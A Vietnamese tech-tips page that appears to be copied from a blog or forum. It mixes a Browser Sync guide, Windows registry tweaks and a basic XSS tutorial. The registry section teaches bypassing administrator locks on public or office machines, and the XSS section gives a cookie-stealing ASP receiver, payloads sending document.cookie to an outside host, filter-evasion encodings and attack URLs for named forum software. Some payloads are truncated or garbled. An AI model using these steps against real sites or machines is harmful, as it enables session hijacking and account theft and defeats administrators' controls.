Sau tất cả, giống như Silicon Valley, ngài Gate cũng đã học được từ một số sai lầm của mình. Tại Davos, ngài Gates buồn bã thừa nhận rằng Google ”đã đá đít chúng tôi”, nhắc nhở ông ta về những gì mà bản thân Microsoft đã từng làm với các hãng khác ở hai thập kỷ trước.

Ông ta nói: ”Chiến lược của chúng tôi là làm một công việc tốt dựa trên 80% những yêu cầu phổ biến và bỏ qua những thứ khác”. Nhưng, ông nói thêm rằng: ”Vẫn còn lại 20%, bởi vì đó là nơi dành cho sự nhận thức về chất lượng”.

Ông ta hứa không lặp lại sai lầm đó.

Google Browser Sync – đồng bộ các thiết lập Mozilla Firefox giữa nhiều máy tính

Google Browser Sync là một tiện ích mới của Google cho phép người dùng Internet đồng bộ các thiết lập của trình duyệt Mozilla Firefox (bookmark, history, cookies, tên và mật khẩu đăng nhập website đã ghi nhớ…) giữa nhiều máy tính khác nhau dựa trên một tài khoản Gmail đăng ký từ trước.

Thay vì áp dụng phương pháp thủ công là sao lưu bằng tay các thiết lập của Mozilla Firefox đang xài rồi mang sang những máy khác để khôi phục, từ bây giờ cho dù đang ở bất cứ nơi đâu, bạn vẫn có thể truy cập được vào được những trang web yêu thích đã đánh dấu trong trình duyệt “con cưng” từ máy cá nhân.

Một khả năng tuyệt vời khác của Google Browser Sync là ghi nhận những trang web mà bạn từng mở trong phiên làm việc cuối với Mozilla Firefox và cung cấp tùy chọn để bạn phục hồi lại chúng trong phiên làm việc kế tiếp. Nhìn chung, Google Browser Sync là công cụ thực sự hữu ích với những ai thường xuyên phải làm việc lưu động.

1. Để sử dụng, trước tiên bạn dùng Mozilla Firefox truy cập vào địa chỉ www.google.com/tools/firefox/browsersync để cài đặt Google Browser Sync trên máy cá nhân.

Trong trang web xuất hiện, bạn bấm vào liên kết “browsersync.xpi” nằm dưới dòng chữ Install Now. Ở trang kế tiếp, bạn bấm nhanh nút Agree and Install và trong hộp thoại mở ra, chờ vài giây rồi bấm nút Install Now. Tiếp đến, bấm Restart Firefox cho Mozilla Firefox khởi động lại nhằm hoàn tất việc cài đặt.

- Tại hộp thoại Welcome to Google Browser Sync hiện ra ngay sau đó, bạn bấm Next để bắt đầu việc sao lưu các thiết lập trên trình duyệt Mozilla Firefox hiện hành.

- Trong hộp thoại “Setting up your account“, bạn lần lượt gõ tên và mật khẩu đăng nhập tài khoản Gmail của mình vào hai hộp Email và Password, rồi bấm Next. Trong trường hợp chưa có tài khoản Gmail, bạn hãy bấm vào dòng chữ Create an account now để đăng ký.

- Trong hộp thoại Setup Type kế đó, chương trình đưa ra 2 chế độ sao lưu và đồng bộ dữ liệu của Mozilla Firefox với các máy khác để bạn chọn lựa là: Standard (sao lưu và đồng bộ tất cả thiết lập quan trọng nhất), Advanced (cho phép bạn tùy chọn những thành phần muốn sao lưu). Xong, bấm Next.

Trong hộp thoại “Choosing a PIN“, bạn nhập vào 2 hộp Choose a PIN và Confirm PIN mật khẩu dùng để giải mã dữ liệu Mozilla Firefox (đã sao lưu từ máy cá nhân) trên những máy khác, rồi bấm Next. Sau đó, chờ chương trình tạo ra một tài khoản Google Browser Sync cũng như đưa thông tin về dữ liệu sao lưu lên server, đến khi hộp thoại “Congratulation. You’ve successfully installed Google Browser Sync” xuất hiện là hoàn tất.

Sau khi bấm Finish, phía trên góc phải giao diện Mozilla Firefox sẽ xuất hiện thêm biểu tượng của Google Browser Sync với tiêu đề là tên đăng nhập tài khoản Gmail của bạn. Nhấp chuột vào nó và chọn Settings để mở cửa sổ thiết lập thông số làm việc cho Google Browser Sync (ảnh 1).

Tại thẻ Account Information > Google Account, bấm nút Stop syncing khi muốn tạm dừng việc đồng bộ dữ liệu. Nếu lỡ quên mật khẩu giải mã dữ liệu đã xác lập ở trên, bạn bấm nút Show ở trường Security PIN. Nút Full Refresh tại trường Full Refresh có chức năng cập nhật thêm những dữ liệu mà bạn vừa lưu lại trong Mozilla Firefox. Tại thẻ Sync Settings, bạn có thể chọn lọc ra những thành phần nào muốn đồng bộ với máy khác và cần phải có mật khẩu để giải mã dữ liệu. Xong, bấm OK.

2. Khi muốn đồng bộ dữ liệu Mozilla Firefox trên máy cá nhân với máy khác (chẳng hạn máy cơ quan), bạn thực hiện tuần tự như sau:

- Cài đặt Google Browser Sync vào máy này. Trong hộp thoại Welcome to Google Browser Sync, bạn bấm Next. Trong hộp thoại “Setting up your account“, bạn cũng nhập tên và mật khẩu đăng nhập tài khoản Gmail của mình vào 2 hộp Email và Password, rồi bấm Next.

- Đến với hộp thoại Welcome back to Google Browser Sync, bạn nhập mật khẩu giải mã dữ liệu Mozilla Firefox vào hộp Enter PIN và bấm Next. Tiếp theo là khoảng thời gian chờ đợi (có thể vài phút hoặc lâu hơn tùy thuộc vào tốc độ đường truyền) trong khi chương trình kết nối và nhận dữ liệu về từ server. Đến khi hộp thoại “You’ve successfully installed Google Browser Sync on this machine” xuất hiện là việc đồng bộ dữ liệu Mozilla Firefox giữa 2 máy đã thành công. Từ lúc này, mọi thay đổi về thiết lập của Mozilla Firefox mà bạn tạo ra trên máy cơ quan đều ảnh hưởng đến Mozilla Firefox trên máy cá nhân (trừ phi bạn tạm dừng việc đồng bộ dữ liệu).

Bấm nút Finish và trong trang web mở ra, bạn sẽ thấy cửa sổ Restore Last Session với nút lệnh Restore page có chức năng phục hồi cửa sổ những trang web mà bạn đã mở trong phiên làm việc cuối trên máy cá nhân

Chạy nhiều Yahoo! Messenger cùng một lúc

Bật notepad, copy đoạn mã sau rồi save với tên multi.reg

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\yahoo\pager\Test]
“Plural”=dword:00000001

Click đúp chuột vào file multi.reg

Các Phương Pháp can thiệp vào Registry

Registry là gì?
…..
Cấu trúc của Registry:
…..
Thao tác lên Registry.

Có nhiều cách thao tác lên Registry gồm các cách sau:

Cách thông thường nhất là sử dụng chương trình Registry Edit có sẵn trong Window: => vào start ==> Run ==> Regedit (dành cho người sử dụng window).

Trong các ngôn ngữ lập trình ứng dụng với window đều có tích hợp sẵng những hàm để can thiệp vào Registry (dành cho lập trình)

Nhưng không phải lúc nào bạn cũng có thể can thiệp được vào Registry một khi người quản trị hệ thống đã khóa chức năng soạn thảo Registry (trong những lúc bạn sử dụng máy ở ngoài tiệm internet hay trong văn phòng…) để tránh trường hợp người không có kinh nghiệm sửa đổi sẽ làm cho hệ thống mất ổn định.

Vậy nếu như bạn gặp trường hợp đó chẳng lẽ phải bó tay sao và nhất là với những ai chuyên nghiên cứu về thâm nhập chẳng hạn.

Ví dụ như người quản trị ẩn hết tất cả các menu Run, các items trong Control Panel, tắt các service quan trọng,… và ẩn cả những chức năng và các biểu tượng trên desktop… Và sau đó không cho mở trình truy cập vào Registry. Vậy làm sao bạn có thể thao tác và sửa đổi khi mà Registry Editor không thể sử dụng được?

Trong bài viết này tôi sẽ chủ yếu đi vào cách can thiệp vào Registry một cách đơn giản nhất bằng những công cụ có sẵn và chắc chắn là ít bao giờ bị khóa đó là sử dụng chương trình NotePad để can thiệp và có thể sử dụng cả command line.

Cách thứ nhất: tạo ra file thuần text có đuôi .reg và đơn giản là chạy nó để tạo key trong Registry

File .reg có cấu trúc như sau:

Windows Registry Editor Version 5.00
(Khoảng trống)
(Key cần tạo)

Ví dụ: Tạo một Registry có chức năng cấm hiển thị Task Manager (Ctrl + Alt + Del)

Bạn mở Notepad dán đoạn code dưới vào sau đó lưu với tên
disTaskManager.reg

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
“DisableTaskMgr”=dword:00000001

Chạy thử nó và nhấn Yes để chấp nhận sau đó nhấn thử (Ctrl + Alt + Del) thì Task Manager sẽ không được phép thực thi.

Để bật lại chỉ cần thay giá trị dword:00000001 ==> dword:00000000 và chạy lại lần nữa. Sau đó để hiển thị được Task Manager bạn chỉ cần cho chạy file này:

enableTaskManager.reg

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
“DisableTaskMgr”=dword:00000000

Để thực thi được file .reg với điều kiện là chức năng này được cho phép, Vậy trong trường hợp bị khóa thì sao ???

Ví dụ: Bạn tạo thử một file .reg có tên là LockRegistry.reg sau đó chạy thử xem chuyện gì sẽ xảy ra nha

LockRegistry.reg

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
“DisableRegistryTools”=dword:00000001

Khi chạy file LockRegistry.reg rồi bạn thử vào start ==> run ==> regedit thì một dòng thông báo sẽ hiện ra như sau: “Registry Editing have been disabled by your administrator” và bạn tạo file

unLockRegistry.reg

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
“DisableRegistryTools”=dword:00000000

và khi thực thi nó thì dòng thông báo trên cũng vẫn xuất hiện và không cho phép tiếp tục thực thi file unLockRegistry.reg.

2/Cách thứ hai

Vậy làm cách nào để bật Registry edit lên lại?? xin thưa bạn hãy xem qua bài chạy chương trình bất kỳ dưới quyền hệ thống thì sẽ có cách giải quyết ngay thôi.

Bạn sẽ làm như sau: ví dụ giờ của hệ thống đang là 10:30AM
_Mở Start ==> Run ==> cmd
_Từ dấu nhắc dos gõ lệnh: At 10:31AM /interactive Registry
_Sau đó ngồi chờ đúng 10:31 thì Registry Editor sẽ hiện lên.
_Vào HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
và đổi giá trị cho key DisableRegistryTools ==> dword=00000000 thế là xong, quá đơn giản phải không?

Cách thứ 3: sử dụng command line
Đó là bạn sử dụng lệnh Reg (để nghiên cứu thêm về lệnh reg các bạn có thể ra Mở Run =>cmd=>reg/? để biết thêm chi tiết.

Trở lại ví dụ lúc nãy để enable lại Registry edit gõ lệnh như sau:

REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 0 /f

Vậy như đặt trường hợp lỡ hợp thoại Run cũng bị khóa và Hệ thống không cho truy cập Dos thì sao ?? Cái này là thường thấy ở các tiệm Net

Cách thứ 4: Thế là lại nhờ tới anh NotePad và biết một chút về lập trình với VBScript là xong, còn nếu không biết về VBScript thì cứ copy và dán đoạn Script sau vào và đặt tên là EnableRegistry.vbs và chỉ cần nhấn đúp để chạy nó thì Registry Edit sẽ hết bị khóa.

EnableRegistry.vbs
Code:

 Option ExplicitDim WSHShell: Set WSHShell = WScript.CreateObject("WScript.Shell")Dim Root: Root = "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\"Dim Key: Key = "DisableRegistryTools"Dim ItemType: ItemType = "REG_DWORD"'0:Enable , 1:DisableDim Value: Value = 0On Error Resume NextWSHShell.RegWrite Root & Key, Value, ItemTypeMybox = MsgBox("Registry Enabled", 4096, "Success")

Ngoài ra VBscript cũng cung cấp sẵn các hàm để tạo Key, Xóa Key, Đọc Key các bạn tự tham khảo.
_Đọc Key: n = WSHShell.RegRead (Root & Key) đưa ra giá trị n
-Xóa Key: WSHShell.RegDelete (Root & Key)

Ví dụ: Tạo một file VBScript có tác dụng tắt và mở chức năng của Registry (File này tự động dò tìm nếu trường hợp Registry đang bị Disable thì Enable lên và ngược lại:

AutoRegistry.vbs
Code:

 Option Explicit

Dim WSHShell: Set WSHShell = WScript.CreateObject("WScript.Shell")'Khai bao keyDim Root: Root = "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\"Dim Key: Key = "DisableRegistryTools"Dim ItemType: ItemType = "REG_DWORD"

'0:Enable , 1:DisableDim enaValue: enaValue = 0Dim disValue: disValue = 1

'Cac cau thong baoDim enaMes: enaMes="Enabled !"Dim disMes: disMes="Disabled !"Dim mainMes: MainMes="Registry Editor is "

Err.Clear

On Error Resume Next'lay va kiem tra gia tri cua Key xem dang Enable hay DisableDim valueGet: valueGet = WSHShell.RegRead (Root & Key)Dim errNum: errNum = Err.Number

'Neu khong co key thi tao keyOn Error Goto 0if errNum  0 thenWSHShell.RegWrite Root & Key , disValue, itemtypeEnd If'Neu co key kiem tra gia tri key n neu dang enable thi disable va nguoc laiDim MyBoxIf valueGet = enaValue ThenWSHShell.RegWrite Root & Key , disValue, itemtypeMyBox = MsgBox(MainMes & disMes, 4096, "Success")ElseIf valueGet = disValue thenWSHShell.RegWrite Root & Key, enaValue, itemtypeMyBox = MsgBox(MainMes & enaMes, 4096, "Success")

End If

Nói chung là còn rất nhiều cách nhưng vấn đề ở đây là cốt lõi và bạn phải nắm được căn bản về Registry và phải biết “Tùy cơ ứng biến”.

Sau đây là các Thủ thuật về Registry cần thiết cho việc thâm nhập:

1/Enable Remote Assistance (Windows XP)
Registry Settings
System Key: [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
Value Name: AllowTSConnections, fDenyTSConnections, fAllowToGetHelp
Data Type: REG_DWORD (DWORD Value)

Tạo hoặc sửa các Giá trị DWORD:
Giá trị REG_SZ mặt định
AllowTSConnections REG_DWORD 0×00000001 (1) sửa thành ==>0
fDenyTSConnections REG_DWORD 0×00000000 (0) sửa thành ==>1
fAllowToGetHelp REG_DWORD 0×00000001 (1) sửa thành ==>0

2/Bật hoặc tắt các Service khác

Các giá trị của dword được hiểu như sau:
dword:00000002 Automatic
dword:00000003 Manual
dword:00000004 Disabled

Để bật Service nào đó bạn chỉ cần đổi giá trị về dword:00000002 và khởi động lại

REGEDIT4

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Alerter]
“Description”=”Allows alert messages to be sent to W2K servers.”
“Start”=dword:00000004

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ALG]
“Description”=”Allows you to use the built-in firewall.”
“Start”=dword:00000003

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\AppMgmt]
“Description”=”Allows programs to use the add/remove control panel”
“Start”=dword:00000003

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BITS]
“Description”=”Allows you to resume file transfers on slow connections.”
“Start”=dword:00000003

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Browser]
“Description”=”Used to show a list of computers on a local network.”
“Start”=dword:00000002

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ClipSrv]
“Description”=”Permits you to cut and paste text and graphics over the network.”
“Start”=dword:00000004

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\COMSysApp]
“Description”=”Allows COM-aware software components to communicate with each other.”
“Start”=dword:00000003

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\CryptSvc]
“Description”=”Allows for authentication, encoding and encryption to verify software signatures.”
“Start”=dword:00000002

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ERSvc]
“Description”=”Allows applications to send error reports to Microsoft if/when they crash.”
“Start”=dword:00000003

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventSystem]
“Description”=”A method for allowing software compenents to communicate with each other.”
“Start”=dword:00000002

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\FastUserSwitchingCompatibility]
“Description”=”Allows for multiple users on a single machine without requiring you to log out.”
“Start”=dword:00000004

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\helpsvc]
“Description”=”Allows the XP Built-in Help and Support Center to run.”
“Start”=dword:00000003

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ICFS]
“Description”=”Enables the built-in Microsoft firewall.”
“Start”=dword:00000003

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanworkstation]
“Description”=”The Workstation service enables a computer to connect to and use network resources.”
“Start”=dword:00000002

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LmHosts]
“Description”=”Enables NetBIOS over TCP/IP (NetBT) services.”
“Start”=dword:00000002

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Messenger]
“Description”=”Despite its best efforts, it’s an evil service that has massive security flaws.”
“Start”=dword:00000004

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\mnmsrvc]
“Description”=”Allows NetMeeting programs to access the local computer.”
“Start”=dword:00000004

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MSDTC]
“Description”=”Provides data replication between a client and multiple Windows servers.”
“Start”=dword:00000003

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MSIServer]
“Description”=”Allows for programs to be installed. Enough said.”
“Start”=dword:00000003

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Nla]
“Description”=”Useful if you have a multihomed or multiple-network connected computer.”
“Start”=dword:00000002

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\PolicyAgent]
“Description”=”Provides IPSEC capabilities (secure TCP/IP).”
“Start”=dword:00000003

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ProtectedStorage]
“Description”=”Allows the local computer to save passwords.”
“Start”=dword:00000002

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RDSessMgr]
“Description”=”Allows remote access and control of the local computer.”
“Start”=dword:00000004

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RemoteRegistry]
“Description”=”Allows remote access and control of the Windows registry.”
“Start”=dword:00000004

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RSVP]
“Description”=”See MS-Technet Q316666 for vague details.”
“Start”=dword:00000003

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RPCLocator]
“Description”=”Allows distributed applications to use the Microsoft RPC name service.”
“Start”=dword:00000003

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\seclogon]
“Description”=”Enables starting processes under alternate credentials.”
“Start”=dword:00000002

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SENS]
“Description”=”Allows the computer to be aware of network connectivty interruptions.”
“Start”=dword:00000003

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Spooler]
“Description”=”Loads files to memory for faster printing.”
“Start”=dword:00000002

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\srservice]
“Description”=”System Restore BloatWare ™. Just say no.”
“Start”=dword:00000004

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Schedule]
“Description”=”Start programs at specified times.”
“Start”=dword:00000002

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SSDPSRV]
“Description”=”An often unused discovery protocol that has yet to catch on.”
“Start”=dword:00000004

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
“Description”=”Used mainly to allow for fast user switching.”
“Start”=dword:00000004

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Themes]
“Description”=”Applies visual styles to the user interface via ComCtl32.dll.”
“Start”=dword:00000003

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TrkWks]
“Description”=”Updates the location of links that are moved on NTFS volumes.”
“Start”=dword:00000003

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\upnphost]
“Description”=”Essentially a networkable version of Plug and Play that never really caught on.”
“Start”=dword:00000003

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UPS]
“Description”=”Uninterruptible Power Supply service Manager.”
“Start”=dword:00000003

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time]
“Description”=”Allows the local computer to synchronize its clock with an Internet Time Server”
“Start”=dword:00000002

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WebClient]
“Description”=”Enables Windows-based programs to create, access, and modify non-local files across the Internet.”
“Start”=dword:00000002

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\winmgmt]
“Description”=”Similiar to Simple Network Management Protocol (SNMP) and Desktop Management Interface (DMI).”
“Start”=dword:00000003

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WmdmPmSp]
“Description”=”Allows your portable music player to be tracked by serial number.”
“Start”=dword:00000003

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Wmi]
“Description”=”Essentially an XML encoder for representing network services.”
“Start”=dword:00000002

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv]
“Description”=”Allows you to use the WindowsUpdate website.”
“Start”=dword:00000002

Ngoài ra các bạn có thể tham khảo thêm về các thủ thuật về Registry chủ yếu là công dụng của từng key có rất nhiều trên
các website bài viết này tôi chỉ giới thiệu một vài key cần thiết và làm cách nào để can thiệp vào Registry mà thôi công việc tìm công năng của từng key các bạn hãy tự tìm (ví dụ như tắt Firewall, Tắt chương trình cảnh báo của Microsoft, tắt các chương trình Antivirus …)

Xss cơ bản

XSS cơ bản
Lỗi xảy ra như thế nào ? Lỗi này xảy ra khi ứng dụng web thu nhận các dữ liệu nguy hiểm được nhập từ hacker . Như bạn đã biết thì 1 website thường chứa các link , thông qua các link này hacker có thể chèn các đoạn code vào và khi người dùng nào đó sử dụng link này thì coi như 99% là toi mạng , nói nôm na là hacker có thể thông qua lỗi này để chèn code vào site hay link để chôm các thông tin quan trọng từ nạn nhân, các thông tin quan trọng ở đây có thể là cookie hoặc username + pass để vào tài khoản 1 ngân hàng nào đó sau đó thông tin này được gửi tới cho hacker . Cách thường dùng của hacker là mã hoá các phần nguy hiểm của link ( đã chèn code) thành kiểu HEX ( hoặc có thể là các hình thức khác ) để làm cho nạn nhân ít nghi ngờ khi click vào cái link nguy hiểm đó . Sau đó là tìm cách nào đó để cho nạn nhân chịu click vào cái link đã đặt bẫy đó , cái này tùy thuộc vào sự gian xảo của từng hacker , càng gian xảo thì càng mau ######ng thu được kết quả . Hầu hết các ứng dụng web hiện nay dùng cookie để kết hợp 1 tài khoản duy nhất cho 1 người dùng nào đó , nghĩa là cookie của người nào người đó xài . Các webmail , web bán hàng , nhà băng , … đa số đều dùng cookie với mục đích chứng thực ngừơi dùng , và đây cũng là cái mà hacker cần . Vậy chứ chèn code là chèn cái quái gì , dùng cái gì để chèn : dùng Javascript ( thông dụng ) , VBscript , ActiveX, HTML,hoặc Flash Chắc các bạn đã hiểu sơ sơ về cái lỗi này rồi . Không hiểu thì xem tiếp sẽ hiểu . Bi giờ chúng ta sẽ nói thật rõ về cái lỗi này : Trước hết giới thiệu sơ với các bạn về cách mã hoá 1 số các kí tự thường dùng trong lỗi XSS của thanh ADDRESS để chút nữa khỏi bị choáng : ——————- Vì IBF Forum không hỗ trợ table trong bài viết nên các bạn có thể xem chi tiết đầy đủ bài viết tại đây : http://members.lycos.co.uk/masknbta/mask.rtf ——————– sơ sơ vậy thôi , muốn biết hết thì các bạn tự kiếm . KIỂM TRA LỖI XSS
Bây giờ tôi sẽ nêu ra các bước để các bạn có thể kiểm tra xem site đó có bị XSS hay không : 1 site bất kì bao giờ cũng có 1 hoặc tất cả các phần sau : search results, error messages , Web-form , chủ yếu lỗi XSS nằm ở các phần này , nói chung là XSS có thể xảy ra ở chỗ nào mà người dùng có thể nhập dữ liệu vào và sau đó sẽ nhận được 1 cái gì đó . Cách tìm lỗi để cho rõ ràng thì các chuyên gia bảo mật chia làm 7 bước nhưng theo tôi nên chia thành 5 bước : Bước 1 : Mở website cần kiểm tra ( cái này tất nhiên rồi ) Bước 2 : Bắt đầu kiểm tra , định vị 1 ô tìm kiếm hoặc 1 login form và gửi thông tin đi (nhập thông tin và nhấn submit hay login hay ok gì đó ) , ví dụ nhập chữ “Mask_NBTA” chẳng hạn hay chữ gì cũng được . Bước 3 : Xác định khả năng site có bị lỗi XSS hay không bằng cách xem thông tin trả về : Ví dụ bạn thấy như thế này : · “Your search for ‘Mask_NBTA’ did not find any items” · “Your search for ‘Mask_NBTA’ returned the following results” · “User ‘Mask_NBTA’ is not valid” · “Invalid login ‘Mask_NBTA’” hoặc là cái quái gì đó mà có dính tới chữ “Mask_NBTA” mà bạn nhập vào ban đầu thì 99% “Alert” này bi XSS còn vài hình thức thử nữa tôi cũng xin trình bày luôn : + Chú ý các ô input hay các biến ngay trên thanh address ( var= ) thấy mấy cái này thì cứ nhét dữ liệu vào . Hãy thử với những script này : alert(‘Mask_NBTA’) hoặc hoặc
Bước 4 : Chèn code thực sự vào nơi bị lỗi : chèn cái này alert(‘Mask_NBTA’) vào ô ban nãy và nhấn SUBMIT . Nếu sau đó bạn nhận được 1 popup có chữ “Mask_NBTA” thì “Alert” này 100% bị dính XSS . Nhưng xin chú ý , thỉnh thoảng vẫn có trường hợp website đó bị dính XSS nhưng vẫn không xuất hiện cái popup thì buộc lòng bạn phải VIEW SOURCES (mổ bụng) nó ra để xem . Khi view sources nhớ kiếm dòng nàyalert(‘Mask_NBTA’) , nếu có thì hết chạy , XSS đây rồi . Một ví dụ khác thường gặp hơn : Gọi http://sitebiloi.com/ là site bị dính lỗi XSS và ta tìm được nơi bị lỗi như thế này : http://sitebiloi.com/index.php?page=<s…< script> , nghĩa là ta có thể chèn code ngay trên thanh ADDRESS . Tôi không thể trình bày hết mọi tình huống được , cái mà các bạn cần là hiểu ra vấn đề thì bạn sẽ hiểu được khi nào bị lỗi . KHAI THÁC Kiểm tra lỗi đã xong bây giờ phải tìm cách khai thác lỗi để đạt được những gì ta mong muốn : Tôi sẽ trình bày cách thông qua lỗi XSS để lấy cookie của nạn nhân : Bước 1 : tạo 1 file cookie.asp có nội dung như thế này : —————————————————————————- <% Set x = CreateObject(“Scripting.FileSystemObject”) Set y = x.OpenTextFile(Server.MapPath(“mask.txt”), 8, true) y.WriteLine Request.QueryString(“cookie”) y.Close Set y = Nothing Set x = Nothing
%> ——————————————————————————- hoặc file cookie.php như thế này : ////////////////////////////////////////////////////////////////////////////// //////////////////////////////////////////////////////////////////////////////// và upload file này lên host của bạn . Chú ý là nếu bạn dùng file .php thì phải up lên host hỗ trợ PHP (lycos) , dùng file .asp thì up lên host hỗ trợ ASP (brinkster) Bước 2 : lấy lại ví dụ site bị XSS trên thanh address , để lấy cookie của nạn nhân ta làm như thế này : http://sitebiloi.com/index.php?page=<s…< /script> thì ngay lập tức đoạn code đã được chèn vào trong web page , và trông như vầy : ———————————————————– hello window.open(“http://www.hostbanupfile.com/cookie.asp?cookie=”+document.cookie) … ————————————————————– Với đoạn code này thì trình duyệt sẽ thi hành đoạn code và sau đó sẽ gửi toàn bộ cookie tới cho bạn ở dạng file .txt và bạn chỉ việc mở file này ra xem .
Nhưng không phải lúc nào bạn cũng có thể dễ dàng chèn code , lắm lúc cũng phải linh hoạt 1 chút bởi vì người lập trình website cũng đâu thể nào dễ dàng để cho chúng ta lộng hành như vậy , họ cũng có chiêu để ngăn cản chúng ta , cách họ dùng là “Lọc code” (Anti-XSS Filter) . Cơ chế của họ như sau : bộ lọc này sẽ loại bỏ các kí tự đặc biệt mà người dùng nhập vào , đơn giản vậy thôi . Chẳng lẽ hacker chịu bó tay , chưa chắc ! Hacker cũng cố gắng vượt qua “bộ lọc” bằng một vài thủ thuật nhỏ : 1/ Nếu “Bộ lọc” loại bỏ 2 kí tự “” : Hacker sẽ dùng “\x3c” và “\x3e” để thay thế và bắt đầu chèn code với ‘) + ‘) + ‘\x3cscript src=ht*p://hostbanupfile.com/cookie.asp?cookie=”+document.cookie\x3e\x3c/script\x3e’ 2/Biến các đoạn code nguy hiểm thành lời chú giải (comment) : Ví dụ khi hacker nhập vào code thì sẽ bị chặn như sau : Vượt qua cái này cũng rất dễ bằng cách dùng thẻ đóng để đóng cái kia . Nghĩa là ta chèn cái này vào : <img src=”http://none” onerror=”alert(Mask_NBTA was here);window.open( http://sitebanupfile.com/cookie.asp?cookie…cument.cookie); “> lúc này đoạn lọc code ban đầu trở thành : ———————————————————————–
————————————————————– và thế là bộ lọc bị vô hiệu hoá 1 cách nhanh ######ng . Cái này dùng để hack webmail bằng cách tạo fakelogin thì khỏi chê . 3/Không cho JAVASCRIPT tồn tại : Trong trường hợp này thì hầu hết các ký tự đặt biệt được nhập vào từ người dùng đều bị lọc , do đó để vượt qua thì hacker phải mã hoá code nhập vào : Ht*p://sitebiloi.com/search.cgi?query=%26%7balert%28%27Mask %27%29%7d%3b Chuỗi “%26%7balert%28%27Mask%27%29%7d%3b” chính là {alert(‘Mask’)}; đã được mã hoá Tôi nêu thêm ra vài ví dụ nữa để các bạn dễ hình dung : *Forum YABB GOLD 1 SP1 (chưa fix) , bị XSS như sau : ht*p://the.target.xxx/board/YaBB.pl?board=gral;action=display;num=10360245269location%3d’Ht*p://www.hostbanupfile.com/cookie.php?Cookie%3d’%2b(document.cookie)%3b đó đó , mấy cái kí tự loằng ngoằng bi giờ sử dụng rồi đó (tự tra nhé ) *Forum vbullettin (version bao nhiêu quên rồi ) : ht*p://target.com/board/usercp.php?s=[Session ID]“>javascript-:document.write(‘‘); *Forum PHPBB 1.4.4 (hình như 2.0 cũng bị) : vào đăng kí 1 cái acc , sau đó send 1 cái topic , ráng làm sao để “Alert” admin nó đọc đặng còn chôm cookie của nó chứ , tôi gợi ý nhé ———————————————————————————————-
